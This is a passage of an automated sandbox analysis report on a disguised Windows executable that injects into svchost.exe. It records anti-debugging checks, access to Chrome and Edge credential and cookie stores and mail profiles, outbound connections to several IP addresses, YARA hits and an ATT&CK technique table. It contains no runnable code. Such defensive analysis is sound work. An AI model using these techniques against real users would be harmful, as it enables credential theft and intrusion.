                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0919E5E0 LdrInitializeThunk,2_2_0919E5E0
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_03C33568 mov eax, dword ptr fs:[00000030h]0_2_03C33568
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_03C33508 mov eax, dword ptr fs:[00000030h]0_2_03C33508
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_03C31EB8 mov eax, dword ptr fs:[00000030h]0_2_03C31EB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C4610 mov eax, dword ptr fs:[00000030h]2_2_000C4610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C4610 mov eax, dword ptr fs:[00000030h]2_2_000C4610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C4610 mov eax, dword ptr fs:[00000030h]2_2_000C4610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C4610 mov eax, dword ptr fs:[00000030h]2_2_000C4610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C4410 mov eax, dword ptr fs:[00000030h]2_2_000C4410
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C4410 mov eax, dword ptr fs:[00000030h]2_2_000C4410
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C56A0 mov eax, dword ptr fs:[00000030h]2_2_000C56A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C56A0 mov ecx, dword ptr fs:[00000030h]2_2_000C56A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C3540 mov eax, dword ptr fs:[00000030h]2_2_000C3540
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C3540 mov eax, dword ptr fs:[00000030h]2_2_000C3540
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C3540 mov eax, dword ptr fs:[00000030h]2_2_000C3540
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C3060 mov eax, dword ptr fs:[00000030h]2_2_000C3060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C3060 mov eax, dword ptr fs:[00000030h]2_2_000C3060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C3060 mov eax, dword ptr fs:[00000030h]2_2_000C3060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C3060 mov eax, dword ptr fs:[00000030h]2_2_000C3060
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C5848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_000C5848
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C33C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,2_2_000C33C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 158.101.44.242 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.97.3 443Jump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F5C008Jump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe"Jump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeBinary or memory string: Shell_TrayWnd
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,2_2_00417A20
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000002.00000002.4639663388.0000000005501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.svchost.exe.7e10000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271f20.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50f20.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7e10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271f20.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50f20.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6256, type: MEMORYSTR
                Source: Yara matchFile source: 2.2.svchost.exe.7e10000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271f20.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50f20.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7e10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271f20.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50f20.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6256, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeBinary or memory string: WIN_XP
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeBinary or memory string: WIN_XPe
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeBinary or memory string: WIN_VISTA
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeBinary or memory string: WIN_7
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeBinary or memory string: WIN_8
                Source: Yara matchFile source: 2.2.svchost.exe.7e10000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271f20.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50f20.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7e10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271f20.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50f20.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6256, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000002.00000002.4639663388.0000000005501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.svchost.exe.7e10000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271f20.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50f20.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7e10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271f20.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50f20.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6256, type: MEMORYSTR
                Source: Yara matchFile source: 2.2.svchost.exe.7e10000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271f20.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50f20.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7e10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.svchost.exe.3271f20.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.7d50f20.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6256, type: MEMORYSTR
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C6BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,2_2_000C6BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C6B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,2_2_000C6B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C6AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,2_2_000C6AF0
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                2
                Valid Accounts
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                4
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
